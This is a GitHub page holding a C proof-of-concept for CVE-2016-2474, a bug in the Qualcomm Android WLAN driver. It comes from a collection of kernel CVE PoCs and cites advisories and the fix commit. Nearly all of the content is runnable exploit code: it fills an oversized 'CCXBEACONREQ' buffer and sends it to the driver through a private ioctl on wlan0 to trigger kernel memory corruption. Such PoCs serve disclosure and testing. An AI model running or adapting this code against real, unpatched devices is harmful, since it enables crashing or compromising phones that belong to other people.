forked from ScottyBauer/Android_Kernel_CVE_POCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2016-2474.c
75 lines (59 loc) · 1.66 KB
/
CVE-2016-2474.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
/* CVE-2016-2474.c
*
* https://www.codeaurora.org/multiple-vulnerabilities-wlan-driver-cve-2016-2470-cve-2016-2472-cve-2016-2474-cve-2016-2498-cve
*
* https://code.google.com/p/android/issues/detail?id=205742
* https://code.google.com/p/android/issues/detail?id=212337
*
*
* https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=681c310490e49adc43065d1d11006c5a5dc43568
*
**/
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
typedef struct hdd_priv_data_s
{
char *buf;
int used_len;
int total_len;
}hdd_priv_data_t;
static void fill_data(char *data, int used) {
while(used <= 8192) {
/* 4 args, 1= > 0, 2 = 1-165, 3 = 0->2 4 = > 0 */
used += snprintf(data + used, 8192 - used,
" %d %d %d %d", 1, 3, 2, 4);
//pc[<0003000100040203>]
//printf("remaining is %d\n", 8192 - used);
}
}
int main(void)
{
int fd;
struct ifreq freak = { 0 };
memcpy(freak.ifr_name, "wlan0", 5);
fd = socket(AF_INET, SOCK_STREAM, 0);
hdd_priv_data_t priv_data = { 0 };
priv_data.total_len = 8192;
priv_data.buf = mmap(NULL, 4096 * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
strcpy(priv_data.buf, "CCXBEACONREQ -1 ");
fill_data(priv_data.buf, 16);
if (fd < 0) {
printf("Failed with %s\n", strerror(errno));
}
printf("Got socket # %d\n", fd);
freak.ifr_data = (void*)&priv_data;
ioctl(fd, SIOCDEVPRIVATE + 1, &freak);
printf("ret is %s\n", strerror(errno));
close(fd);
}